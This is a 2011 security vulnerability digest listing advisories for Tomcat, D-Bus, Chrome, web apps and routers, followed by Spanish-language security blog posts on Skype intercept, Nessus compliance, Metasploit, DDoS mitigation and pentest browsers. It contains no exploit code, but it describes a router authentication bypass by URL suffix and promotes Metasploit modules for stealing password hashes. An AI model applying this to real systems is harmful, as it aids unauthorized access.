11.27.17 CVE: CVE-2011-2204
Platform: Cross Platform
Title: Apache Tomcat "MemoryUserDatabase" Information Disclosure
Description: Apache Tomcat is a Java-based webserver application for multiple operating systems. The application is exposed to a remote information disclosure issue. This issue is caused by an error when creating users through the JMX feature and using the "MemoryUser"
Database. This will allow attackers to gain access to user authentication credentials. Apache Tomcat versions 5.5.0 through 5.5.33, 6.0.0 through 6.0.32 and 7.0.0 through 7.0.16 are affected.
Ref: http://tomcat.apache.org/security-5.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-7.html
______________________________________________________________________

11.27.18 CVE: CVE-2011-2533
Platform: Cross Platform
Title: D-Bus Configuration Insecure Temporary File Creation Vulnerability
Description: D-Bus is an IPC (Inter-Process Communication) system for applications to talk to one another. The application is exposed to an insecure temporary file creation issue which allows local users to overwrite arbitrary files via a symlink attack on an unspecified file in /tmp/. Versions prior to D-Bus 1.2.28 are vulnerable.
Ref: http://www.securityfocus.com/bid/48460/discuss
______________________________________________________________________

11.27.19 CVE: Not Available
Platform: Cross Platform
Title: Sybase Advantage Server "ADS" Process Off-By-One Buffer Overflow
Description: Sybase Advantage Server is a relational database management application. Sybase Advantage Server is exposed to an off-by-one buffer overflow issue. This issue affects the "ADS" process when handling a malformed packet sent to TCP or UDP port 6262. Sybase Advantage Server 10.0.0.3 is vulnerable and other versions may also be affected.
Ref: http://www.securityfocus.com/bid/48464/discuss
______________________________________________________________________

11.27.20 CVE:
CVE-2011-2351,CVE-2011-2350,CVE-2011-2349,CVE-2011-2348,CVE-2011-2347,CVE-2011-2346,CVE-2011-2345
Platform: Cross Platform
Title: Google Chrome Multiple Security Vulnerabilities
Description: Google Chrome is a web browser for multiple platforms. The application is exposed to multiple security issues. An out-of-bounds read issue occurs when handling NPAPI strings. A use-after-free issue occurs in SVG font handling. A memory corruption issue occurs in CSS parsing. Multiple issues occur with lifetime and re-entrancy in the HTML parser. An issue occurs with improper bounds checking v8 JavaScript engine. A use-after-free issue occurs when handling SVG use elements. A use-after-free issue occurs during text selection. Versions prior to Chrome 12.0.742.112 are vulnerable.
Ref: http://www.securityfocus.com/bid/48479/discuss
______________________________________________________________________

11.27.21 CVE: Not Available
Platform: Web Application - SQL In jection
Title: IdevSpot iSupport "x_category" Parameter SQL Injection
Description: iSupport is a PHP-based application used for help desk and support ticketing. The application is exposed to an SQL injection issue because it fails to properly sanitize user-supplied input submitted to the "x_category" parameter of the "index.php" script.
iSupport versions 1.8 and prior are affected.
Ref: http://www.securityfocus.com/bid/48402/discuss
______________________________________________________________________

11.27.22 CVE: Not Available
Platform: Web Application
Title: ActivDesk Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
Description: ActivDesk is a web-based help desk application. ActivDesk exposed to Multiple SQL injection issues and a cross-site scripting issue that affects the "keywords" parameter of the "search.cgi" script.
ActivDesk version 3.0 is vulnerable and other versions may also be affected.
Ref: http://www.securityfocus.com/bid/48409/discuss
______________________________________________________________________

11.27.23 CVE: Not Available
Platform: Web Application
Title: Nodesforum "3rd_party_limits.php" Remote File Include Vulnerability
Description: Nodesforum is a web-based application implemented in PHP.
The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input submitted to the "_nodesforum_code_path" parameter of the "3rd_party_limits.php"
script. Nodesforum versions 1.059 and prior are vulnerable.
Ref: http://www.securityfocus.com/bid/48428/discuss
______________________________________________________________________

11.27.24 CVE: Not Available
Platform: Web Application
Title: Avactis Shopping Cart Security Bypass and HTML Injection Vulnerabilities
Description: Avactis Shopping Cart is a PHP-based shopping cart. The application is exposed to multiple issues. A security bypass issue due to an unspecified error allows attackers with administrative privileges to gain additional elevated privileges. An unspecified HTML injection issue exists because the application fails to properly validate user-supplied input. Versions prior to Avactis Shopping Cart 2.1.1 are vulnerable.
Ref: http://www.securityfocus.com/bid/48438/discuss
______________________________________________________________________

11.27.25 CVE: Not Available
Platform: Web Application
Title: phpMyAdmin "$_SESSION" Array Unauthorized Access Vulnerability
Description: phpMyAdmin is a web-based administration interface for MySQL databases. The application is exposed to an unauthorized access issue. Specifically, an attacker can manipulate the global "$_SESSION"
array to specify arbitrary values. This may aid the attacker in performing various other attacks, including remote code execution.
phpMyAdmin 3.4.0 is vulnerable; other versions may also be affected.
Ref: http://www.securityfocus.com/bid/48480/discuss
______________________________________________________________________

11.27.26 CVE: Not Available
Platform: Network Device
Title: IBM Web Application Firewall Security Bypass
Description: IBM Web Application Firewall is a security application. The application is exposed to a security bypass issue. An attacker could exploit the issue through HTTP Parameter Pollution by submitting repeated occurrences of the same parameter. IBM Web Application Firewall, IBM Security Server are affected.
Ref: https://www.trustwave.com/spiderlabs/advisories/TWSL2011-006.txt
______________________________________________________________________

11.27.27 CVE: Not Available
Platform: Network Device
Title: H3C ER5100 Authentication Bypass Vulnerability
Description: The H3C ER5100 is a dual-core broadband router. The appliance is exposed to a remote authentication bypass issue. The issue can be exploited by appending a "userLogin.asp" string in the URL to gain administrative access. 3Com H3C ER5100 is affected.
Ref: http://www.wooyun.org/bugs/wooyun-2010-02268
______________________________________________________________________

Legal Intercept - $kype

noreply@blogger.com (Pablo Ramirez Hoffmann) — Thu, 30 Jun 2011 15:13:00 +0000

Microsoft grabará de forma legal las llamadas de voz y vídeo de Skype para ampliar las posibilidades de seguimiento de conversaciones delictivas terroristas en línea. Microsoft ha patentado «Legal Intercept», una tecnología que le permitirá interceptar y monitorizar de forma legal llamadas de voz y vídeo de Skype, servicio que adquirió en mayo por 8.500 millones de dólares.

Microsoft la describe como una herramienta similar a la que las empresas de telecomunicaciones utilizan para cumplir con las exigencias gubernamentales en materia de seguridad. Skype pasa de este modo a entrar en el CALEA (Communications Assistance for Law Enforcement Act), que hace a las empresas de tecnologías de la comunicación puedan ser controladas, siempre por motivos de seguridad y de estado.

A pesar del fin de «Legal Intercept» que ha explicado el gigante de Redmond, la patente ha generado cierto temor entre los internautas en materia de privacidad, como se puede observar en diversos blogs y foros, además de en Twitter, donde abundan los mensajes de alarma.

Compliance with Nessus

noreply@blogger.com (Pablo Ramirez Hoffmann) — Thu, 30 Jun 2011 14:03:00 +0000

Una de las características que ofrece la versión ProfessionalFeed (la de pago, vamos: $1200 al año cada licencia) de Nessus —entre otras— es la posibilidad de realizar auditorías de cumplimiento a sistemas Unix y Windows, aplicaciones o bases de datos SQL basadas en estándares ya predefinidos.
Así pues, podremos realizar auditorías de cumplimiento basándonos en las recomendaciones CERT, guías de buenas prácticas CIS o NSA, requerimientos de configuración PCI , e incluso Bandolier (proyecto de Digital Bond) proporciona políticas de cumplimiento (a través de ficheros .audit de los cuales hablaremos a continuación) para auditar sistemas SCADA, DCS y otras aplicaciones de sistemas de control industrial, entre otros.
El cumplimiento o no cumplimiento de dichas recomendaciones viene predefinido por los ya mencionados ficheros de extensión .audit que ofrece Tenable a través de su centro de soporte. Podemos descargarnos diversos ficheros .audit que nos definan por ejemplo políticas de auditorías desarrolladas por Tenable para auditar sistemas Windows, Linux, HP-UX, Solaris y AIX para comprobar el cumplimiento de unos requerimientos de configuración mínimos establecidos según el estándar PCI, políticas de cumplimiento basadas en las mejores prácticas según Cisco para la configuración de sus dispositivos o incluso políticas de auditoría que analizan la presencia de contenido “sensible” en los sistemas a auditar (contenido para adultos, información corporativa confidencial, números de tarjetas de crédito, etc.) por citar algunos ejemplos.
Por ejemplo si queremos auditar un dispositivo Cisco según las propias recomendaciones sobre buenas prácticas de Cisco usaríamos el fichero .audit correspondiente. Veamos una posible puesta en escena. El primer paso es crearnos nuestra política:

Descargamos el fichero .audit correspondiente del centro de soporte. En este caso a modo de ejemplo usaremos Cumplimiento_Cisco_Level_2.audit: fichero que implementa las recomendaciones de configuración de nivel 2 según el CIS Cisco IOS Benchmark v2.4.0. En la descripción del fichero .audit además indica que es necesario que toda la familia de plugins de Cisco esté habilitada, así que no debemos olvidarnos de habilitar el plugin correspondiente a Cisco dentro de la familia de plugins del cumplimiento de las políticas:

A continuación en Preferencias cargamos el fichero .audit que hemos descargado previamente seleccionando el plugin ‘Cisco IOS Compliance Checks’; como vemos permite incluir hasta cinco ficheros .audit de política de Cisco que permiten verificar si dispositivo con Cisco IOS está configurado conforme a los estándares de seguridad indicados en las políticas cargadas:

De este modo tan simple, ya tendríamos la política creada para auditar nuestro dispositivo y ver si cumple con las recomendaciones que el proveedor nos da.

Si nuestra empresa dispone de su propia política de seguridad en cuanto a configuraciones de servidores por ejemplo podemos editar nuestro propio fichero .audit para realizar la auditoría de cumplimiento de acuerdo a nuestra propia política. Asimismo, en el centro de soporte de Nessus se proporcionan también diversas Tools (i2a, c2a, p2a) para generar nuestros propios ficheros .audit a partir de otros ficheros. Así, por ejemplo podemos generar ficheros .audit a partir de ficheros .inf de Windows. por citar un ejemplo. Para aquellos interesados, Tenable proporciona información al respecto de la creación de ficheros .audit en su centro de soporte e invita a que los usuarios interesados visiten los foros de discusión del producto.

Fuente: Maite Moreno – SAW

Defcon Kid - Los futuros Sombreros Blancos

noreply@blogger.com (Pablo Ramirez Hoffmann) — Sat, 25 Jun 2011 18:31:00 +0000

CUANDO TOMAREMOS ESTAS INICITAIVAS EN CHILE…

Niños entre 8 y 16 años se reunirán en Las Vegas en agosto para un inusual “campamento de verano” en el que aprenderán a ser hackers (de los buenos, que no roban, ni hacen trampa ni cometen crímenes). Se trata de la primera Defcon infantil, que enseñará a los chicos las habilidades de los hackers, además de enseñarles a protegerse de ciberataques.

También será la oportunidad para que el gobierno de Estados Unidos identifique posibles talentos para la próxima generación de policía cibernética. La Defcon normal funciona ya hoy en día como un lugar donde la policía, agentes de inteligencia, militares y otros reclutan miembros talentosos.

La conferencia se realizará en paralelo a la Defcon adulta, entre el 6 y 7 de agosto. La idea principal es convencer a los niños que está bien ser un hacker de “sombrero blanco” (como se le llama a los buenos), que usan sus habilidades para combatir crímenes. Los hackers de “sombrero negro” (también crackers, o hackers maliciosos) en cambio son los que usan sus habilidades para robar dinero, identidades y otros crímenes.

Este tema ha estado en la palestra fuertemente en los últimos meses con bullados casos de hackeos como lo que le ocurrió a Sony con la PSN, a Lockheed Martin y RSA, FMI, HYDOAYSEN, GOBIERNO DE CHILE entre otros y los movimientos de LulzSec.

Esperemos que alguna entidad gubernamental, empresas o ISP tomen la iniciativa para que en fututo conozcamos a nuestros nuevos partners de seguridad y talentos informáticos.

Release Metasploit Framework 3.7.2

noreply@blogger.com (Pablo Ramirez Hoffmann) — Tue, 21 Jun 2011 18:40:00 +0000

Desde Metasploit nos informan del Nuevo release de esta incredible herramienta:

It's that time again! The Metasploit team is proud to announce the immediate release of the latest version of the Metasploit Framework, 3.7.2. Today's release includes eleven new exploit modules and fifteen post modules for your pwning pleasure. Adding to Metasploit's well-known hashdump capabilities, now you can easily steal password hashes from Linux, OSX, and Solaris. As an added bonus, if any of the passwords were hashed with crypt_blowfish (which is the default on some Linux distributions) any time since 1998, they may be considerably easier to crack. For more cracking fun, Maurizio Agazzini and Mubix's hard work has paid off in a new cachedump module. As the name implies, cachedump allows you to steal Windows cached password hashes. They can't be used directly like those obtained with hashdump, but JtR can crack them. If cracking sounds hard regardless of 13 year old bugs and proprietary hash algorithms, you might be interested in the latest post modules from TheLightCosine: they steal passwords from several applications which conveniently store them for lazy users in what is equivalent to plaintext.

Metasploit gets better every day.

For more details about this release, see the 3.7.2 Release Notes

Mitigación de un DDoS

noreply@blogger.com (Pablo Ramirez Hoffmann) — Tue, 21 Jun 2011 16:59:00 +0000

En algún momento les comenté sobre los ataques de denegación de servicios, cuáles eran sus variantes y algunas herramientas utilizadas por los atacantes, hoy les traigo algunos ejemplos de mitigación. Espero sean de su interés.

Los ataques de Denegación de Servicio (Denial of Service, DoS) son casi tan antiguos como las redes de comunicaciones, pero de un tiempo a esta parte se han popularizado entre las bandadas de script kiddies, para atacar a todo lo que no les gusta.

Ya sean partidos políticos, webs de ministerios e instituciones del estado, empresas privadas, etc. Nadie está a salvo de la ira vengadora de estos hacktivistas que últimamente están apareciendo en los diferentes medios tecnológicos y diarios de renombre, es más como todo saben, ya le pasaron la cuenta a Hidroaysen y al ministerio de energía.

Primera observación: es delito en España desde diciembre del 2010 (CUANDO SERÁ EN CHILE) participar en este tipo de ataques. Se lee en Twitter, a algunos, que argumentan que los atacantes sólo se ponen de acuerdo para visitar una página web. Llamar al 133 no es delito, por supuesto. Ponerte de acuerdo con 1000 colegas para que cada uno haga mil llamadas al 133 a una hora concreta puede poner vidas en peligro si nadie puede avisar a los señores carabineros de un delito.

Este es el esquema de ataque desde una vista global.

Pero dejando el tema ético-legales a un lado, ¿qué se puede hacer para defenderse de ataques DoS? No es fácil y no hay soluciones mágicas, pero hay cosas que se pueden hacer:

Estar preparado
Los ataques que consisten en miles de conexiones válidas por segundo funcionan porque cada una de las conexiones supone una carga en nuestros servidores (mostrar la información de la página web, quizá haciendo consultas a una base de datos, etc.)

Todo el mundo que tiene página web debería tener calculado el impacto en rendimiento de sus páginas, y tener siempre un website alternativo de bajo impacto para situaciones de sobrecarga. Por ejemplo, durante los ataques en Nueva York del 11-S, muchos medios de comunicación sufrieron un ataque DoS no intencionado, al tener a millones de personas por todo el mundo intentando enterarse de qué pasaba, lo mismo paso en Chile hace unos días atrás, cuando por las noticias informaban sobre las acreencias y que visitaran el sitio www.clientebancario.cl . Algunos, como la CNN cambiaron su página normal por una de sólo texto, sin publicidad, ni elementos innecesarios, de forma que cada petición se pudiera procesar en menos tiempo y así poder atender más conexiones por segundo.

Esto se puede incluso automatizar, de forma que los servidores web cambien automáticamente a la versión light en cuanto detectan un aumento inesperado del nivel de peticiones.

Usar redes de distribución de contenido (CDN)
Los CDN son sistemas que permiten a las empresas distribuir su contenido estático por servidores distribuidos por todo el mundo, como los proporcionados por la empresa Akamai.

Que te ayude tu proveedor de acceso a Internet
Si tienes un proveedor de acceso serio, siempre podrás pedir que te ayuden en caso de ataque. Como mínimo deberían ser capaces de reenviar el tráfico que está dirigido a tus sistemas, a una ruta inválida (null route) de forma temporal.

El problema de este sistema es que nadie podrá acceder desde fuera, ni los atacantes ni tus usuarios legítimos. Entre los participantes en el ataque, que normalmente no tienen conocimientos suficientes, se cree que el ataque ha tenido éxito, ya que la página web deja de estar accesible.

Esto viene a ser la estrategia de hacerse el muerto, que puede ser muy válida en algunos casos, sobre todo combinada con contenido estático en CDN (ver punto anterior).

Utilizar una solución anti-DDoS proporcionada por tu proveedor de acceso
Esto suele ser lo necesario cuando quieres evitar el ataque, pero quieres mantener tu sitio accesible por usuarios legítimos, y que el contenido no sea estático, sino transaccional. Es decir, seguir operando business as usual. Estas soluciones son complejas, y normalmente las ofrecen los proveedores de acceso a Internet a las grandes empresas, con un coste por supuesto.

Suelen consistir en:

Sistema de detección y prevensión - elementos de red (tipo TippingPoint) que detectan la anomalía en el tráfico de red, herramientas que utilizan los atacantes y exploit a sistemas web.
Mecanismo de redirección puede ser iniciado por el ISP o por la empresa atacada, y suele consistir en publicar una ruta nueva usando el protocolo de rutado BGP, de forma que el tráfico a ciertas IPs se redirija a través de un sistema de mitigación.
Sistema de mitigación - son elementos de red (tipo Cisco Guard), gestionados por el ISP, que se comen todo el tráfico (suelen tener una capacidad enorme, difícil de saturar por el ataque típico), y se encargan de separar el grano de la paja mediante análisis estadístico, y reenvían a la empresa atacada el tráfico limpio mediante un túnel GRE cifrado.

Si la disponibilidad y el libre acceso a nuestras aplicaciones y contenido son vitales, es imprescindible tener algún tipo de preparación contra ataques de denegación de servicio. Dependiendo de nuestras necesidades y/o presupuesto, podremos usar unas medidas u otras. Para un estudio estupendo sobre el estado de las cosas, lo mejor es el Network Infrastructure Security Report que publica Arbor Networks anualmente.

Mirror de curso Backtrack 5

noreply@blogger.com (Pablo Ramirez Hoffmann) — Sat, 18 Jun 2011 03:57:00 +0000

Desde omhe nos escriben:

Antes que nada para comunicar que el mirror oficial del curso es el siguiente:
http://www.backtrack5.omhe.org/

En esa URL van a poder descargar todos los videos.

Agradezco de una manera enorme a todas las distintas comunidades y grupos de hacking que han pasado la voz de los videos.

Y avisarles que el curso total será de 20 clases. Aún estamos en la elaboración de la quinta y pronto vamos a liberar la cuarta.

Mantra+FireCAT Browser-Pentester

noreply@blogger.com (Pablo Ramirez Hoffmann) — Fri, 17 Jun 2011 02:42:00 +0000

De DragonJAR obtengo esta noticia, que a mi punto de vista debiera ser el navegador de los desarrolladores o la gente de QA (QUE NUNCA HACE QA DE SEGURIDAD ;-))para aplicaciones web… espero sea de su interés.

Mantra, el navegador pensado para auditorias de aplicaciones web y de FireCAT, conjunto de extensiones de Firefox para Auditorias de Seguridad, les cuento que los desarrolladores de estas dos iniciativas han decidido unir esfuerzos y fusionar sus proyectos para generar el Navegador Definitivo e Auditorias de seguridad.

La unión de estos dos proyectos, que parecía el paso a seguir, ya que FireCAT ofrecía un conjunto de extensiones muy bien organizadas sobre auditoria en seguridad y Mantra un navegador con estas extensiones ya integradas.

Ahora Mantra ofrece una selecta colección de herramientas debidamente organizadas para convertir nuestro navegador en la caja de herramientas necesaria para realizar nuestras auditorias, como podemos ver en el siguiente listado: